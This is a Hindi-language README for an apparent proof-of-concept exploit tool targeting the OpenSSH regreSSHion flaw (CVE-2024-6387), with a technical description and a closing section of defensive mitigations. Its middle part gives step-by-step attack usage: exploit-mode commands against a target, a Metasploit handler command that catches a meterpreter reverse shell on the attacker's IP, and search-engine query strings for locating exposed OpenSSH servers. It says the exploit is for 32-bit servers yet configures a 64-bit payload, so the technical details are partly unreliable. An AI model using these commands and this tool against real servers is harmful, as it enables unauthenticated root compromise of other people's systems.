
OpenSSH सर्वर में दूरस्थ अनप्रमाणित कोड निष्पादन भेद्यता (CVE-2024-6387)
CVE-2024-6387.py - PoCयह एक्सप्लॉइट केवल 32-बिट OpenSSH-सर्वर के लिए काम करता है। ऐसा इसलिए है क्योंकि POC 32-बिट पॉइंटर्स का उपयोग करता है! यह भी ज्ञात है कि कुछ संस्करण पहले से ही पैच किए जा चुके हैं, और हर सर्वर असुरक्षित नहीं है। परीक्षण किया गया: Kali Linux, ParrotSec, Ubuntu 22.04
OpenSSH सर्वर में दूरस्थ अप्रमाणित कोड निष्पादन भेद्यता
CVE-2024-6387.py एक हल्का और कुशल टूल है जिसे OpenSSH के असुरक्षित संस्करणों को चलाने वाले सर्वरों की पहचान करने के लिए डिज़ाइन किया गया है, विशेष रूप से हाल ही में खोजी गई regreSSHion भेद्यता (CVE-2024-6387) को लक्षित करते हुए। यह स्क्रिप्ट संभावित कमजोरियों का पता लगाने और आपके इंफ्रास्ट्रक्चर की सुरक्षा सुनिश्चित करने के लिए कई IP पतों, डोमेन नामों और CIDR नेटवर्क रेंजों की तीव्र स्कैनिंग की सुविधा प्रदान करती है।
OpenSSH के सर्वर (sshd) में एक सिग्नल हैंडलर रेस कंडीशन पाई गई, जहां एक क्लाइंट LoginGraceTime सेकंड (डिफ़ॉल्ट रूप से 120, पुराने OpenSSH संस्करणों में 600) के भीतर प्रमाणित नहीं होता है, तो sshd का SIGALRM हैंडलर अतुल्यकालिक रूप से कॉल किया जाता है। हालाँकि, यह सिग्नल हैंडलर विभिन्न फ़ंक्शनों को कॉल करता है जो async-signal-safe नहीं हैं, उदाहरण के लिए, syslog()।
आप तकनीकी विवरण यहाँ पा सकते हैं।
यह दोष, जिसे Qualys के शोधकर्ताओं ने मई 2024 में खोजा और जिसे पहचानकर्ता CVE-2024-6387 सौंपा गया, sshd में एक सिग्नल हैंडलर रेस कंडीशन के कारण होता है जो अप्रमाणित दूरस्थ हमलावरों को रूट के रूप में मनमाना कोड निष्पादित करने की अनुमति देता है।
"यदि कोई क्लाइंट LoginGraceTime सेकंड (डिफ़ॉल्ट रूप से 120) के भीतर प्रमाणित नहीं होता है, तो sshd का SIGALRM हैंडलर अतुल्यकालिक रूप से कॉल किया जाता है और विभिन्न फ़ंक्शनों को कॉल करता है जो async-signal-safe नहीं हैं,"
"एक दूरस्थ अप्रमाणित हमलावर रूट विशेषाधिकारों के साथ मनमाना कोड निष्पादित करने के लिए इस दोष का लाभ उठा सकता है।"
आवश्यकता: python3 नवीनतम
### Command Line Arguments
mode: Selects the operation mode. Choices are scan or exploit.
-T, --targets: IP addresses, domain names, file paths containing IP addresses, or CIDR network ranges.
-f, --outputfile: File to save results to (e.g., result.json).
-g, --gracetimecheck: Time in seconds to wait after identifying the version to check for LoginGraceTime mitigation (default: 120 seconds).
-n, --nic: Network NIC (default: 'eth0').
-o, --output: Output format for results (choices: 'csv', 'txt', 'json').
-p, --port: Port number to check or exploit (default: 22).
-s, --speed: Number of threads to increase race condition chances (default: 10).
-t, --timeout: Connection timeout in seconds (default: 1 second).
-H, --resolve-hostnames: Resolve Hostnames
python3 CVE-2024-6387.py scan -T example.com -p 22
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0
आपको बस सबसे पहले नीचे दिया गया कमांड चलाना है ({yourip} हैंडलर को बदलें) और उसके बाद उपरोक्त कमांड के साथ एक्सप्लॉइट चलाएं
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"
टूल बेहतर पठनीयता के लिए कंसोल पर रंग-कोडित आउटपुट प्रदान करता है:
हरा: सफल कनेक्शन या ऑपरेशन। लाल: विफल कनेक्शन या त्रुटि। पीला: चेतावनियाँ या उल्लेखनीय जानकारी। सियान: सामान्य जानकारी या स्थिति अपडेट।
/product.name="OpenSSH"app="OpenSSH"product:"OpenSSH"(openssh) and labels=remote-accessपैच प्रबंधन: OpenSSH के लिए उपलब्ध पैच को तुरंत लागू करना भेद्यता की खाई को बंद करने के लिए महत्वपूर्ण है। समय पर पैचिंग यह सुनिश्चित करती है कि ज्ञात शोषणों का उपयोग आपके सिस्टम के विरुद्ध नहीं किया जा सकता है, जिससे हमलावरों के लिए अवसर की खिड़की कम हो जाती है।
उन्नत पहुंच नियंत्रण: नेटवर्क-आधारित नियंत्रणों के माध्यम से SSH पहुंच को सीमित करना सुरक्षा की एक अतिरिक्त परत जोड़ता है। यह दृष्टिकोण SSH कनेक्शनों को केवल अधिकृत नेटवर्कों या IP पतों तक प्रतिबंधित करके संभावित हमलावरों के संपर्क को न्यूनतम करता है। फ़ायरवॉल नियमों जैसे उपकरणों को लागू करना या सुरक्षित पहुंच के लिए VPN का उपयोग करना इन प्रतिबंधों को प्रभावी ढंग से लागू कर सकता है।
नेटवर्क विभाजन: अपने नेटवर्क को खंडों में विभाजित करना संभावित उल्लंघन के प्रभाव को नियंत्रित करने में मदद करता है। महत्वपूर्ण प्रणालियों और संवेदनशील डेटा को अपने नेटवर्क के कम महत्वपूर्ण भागों से अलग करके, आप हमलावरों द्वारा पार्श्व गतिविधि के जोखिम को कम करते हैं। इस विभाजन को सख्त पहुंच नियंत्रण और निगरानी के साथ पूरक किया जा सकता है ताकि इन खंडों को तोड़ने के किसी भी अनधिकृत प्रयास का पता लगाया जा सके और उसका जवाब दिया जा सके।
आक्रमण पहचान प्रणाली (IDS): IDS या आक्रमण रोकथाम प्रणाली (IPS) तैनात करना नेटवर्क ट्रैफ़िक और सिस्टम लॉग की वास्तविक समय निगरानी सक्षम बनाता है। ये प्रणालियाँ regreSSHion भेद्यता से जुड़ी संदिग्ध गतिविधियों और संभावित शोषण प्रयासों का पता लगा सकती हैं। ऐसी प्रणालियों द्वारा ट्रिगर की गई चेतावनियाँ महत्वपूर्ण क्षति होने से पहले त्वरित जांच और शमन की अनुमति देती हैं।
शोषण प्रयासों की निगरानी: नेटवर्क और सिस्टम लॉग की निरंतर निगरानी महत्वपूर्ण है। ऐसे किसी भी असामान्य पैटर्न या गतिविधि की तलाश करें जो OpenSSH भेद्यता का शोषण करने के प्रयास का संकेत दे सकती है। यह सक्रिय दृष्टिकोण नुकसान पहुंचाने से पहले खतरों की पहचान करने और उनका जवाब देने में मदद करता है।